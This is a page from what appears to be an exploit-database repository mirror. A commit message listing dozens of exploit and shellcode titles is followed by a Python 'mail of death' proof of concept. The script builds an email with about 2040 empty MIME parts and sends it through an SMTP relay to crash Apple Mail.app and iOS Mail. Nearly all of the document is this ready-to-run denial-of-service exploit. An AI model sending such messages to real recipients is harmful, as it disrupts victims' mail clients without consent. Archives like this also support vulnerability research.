880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
43 lines
No EOL
1.5 KiB
Python
Executable file
43 lines
No EOL
1.5 KiB
Python
Executable file
source: https://www.securityfocus.com/bid/50446/info
|
|
|
|
Apple Mac OS X and iOS are prone to a denial-of-service vulnerability.
|
|
|
|
Attackers can exploit this issue to cause the affected mail client to crash, effectively denying service.
|
|
|
|
#!/usr/bin/env python
|
|
|
|
# Mail of death for Apple's Mail.app
|
|
#
|
|
# Tested & vulnerable: Leopard/Intel, Snow Leopard, Lion (up to 10.7.2), IOS 4.2.x, 4.3.3
|
|
# Tested != vulnerable: Leopard/PPC
|
|
# Create mail with n_attach MIME attachments
|
|
# Version 1.0; shebang42
|
|
|
|
import smtplib
|
|
|
|
n_attach=2040 # ~2024 is sufficient
|
|
relay='your.mta.goes.here'
|
|
mailfrom = 'mail_of_death@example.com'
|
|
mailto = mailfrom
|
|
subject = 'PoC Apple Mail.app mail of death'
|
|
date = 'October 29, 2011 10:00:00 GMT'
|
|
|
|
|
|
def craft_mail():
|
|
header = 'From: %s\nTo: %s\nSubject: %s\nDate: %s\nContent-Type: multipart/mixed ; boundary="delim"\n\n' % (mailfrom, mailto, subject, date)
|
|
body = '--delim\nContent-Type: text/plain\nContent-Disposition: inline\n\nHello World\nBye Mail.app\n\n\n'
|
|
attach = '--delim\nContent-Disposition: inline\n\n'*n_attach
|
|
|
|
### Another, slightly longer option to crash Mail.app (same bug)
|
|
# attach = '--delim\nContent-Type: text/plain\nContent-Disposition: attachment; filename=AAAAAAAA\n\ncontent\n'*n_attach
|
|
return header + body + attach
|
|
|
|
|
|
def send_mail(mail):
|
|
server = smtplib.SMTP(relay)
|
|
server.sendmail(mailfrom, mailto, mail)
|
|
server.quit()
|
|
|
|
mail=craft_mail()
|
|
#print mail
|
|
send_mail (mail) |